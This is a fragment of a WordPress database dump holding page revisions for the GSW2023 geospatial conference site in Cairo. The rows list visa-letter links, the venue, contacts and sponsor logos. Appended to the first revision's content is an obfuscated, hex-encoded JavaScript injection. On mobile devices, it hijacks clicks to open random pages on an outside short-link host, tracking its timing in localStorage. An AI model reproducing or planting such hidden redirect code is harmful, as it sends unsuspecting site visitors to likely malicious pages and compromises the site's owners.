12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\r\n[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]\r\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\r\n[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-13 16:29:04','2023-08-13 16:29:04','',3066,'https://gsw2023.com/?p=5128',0,'revision','',0),
(5129,1,'2023-08-13 16:29:54','2023-08-13 16:29:54','<h1 style=\"text-align: center;\"><span style=\"font-size: 36pt; color: #0000ff;\"><strong>Under the auspices of </strong></span>\r\n<span style=\"font-size: 36pt; color: #0000ff;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span>\r\n<span style=\"font-size: 36pt; color: #0000ff;\"><strong>Prime Minister of the Arab Republic of Egypt</strong></span></h1>\r\n[vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081337215{margin-top: 40px !important;}\"]\r\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\r\n[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 115px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081933017{margin-top: 145px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n<a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081968974{margin-top: 160px !important;}\"]\r\n\r\n<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081968955{margin-top: 115px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081337215{margin-top: 40px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689080719428{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>                    Platinum Sponsors</strong></span></h4>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081395417{margin-top: 10px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]\r\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]\r\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\r\n<span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" />\r\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\r\n\r\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\r\n<a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px 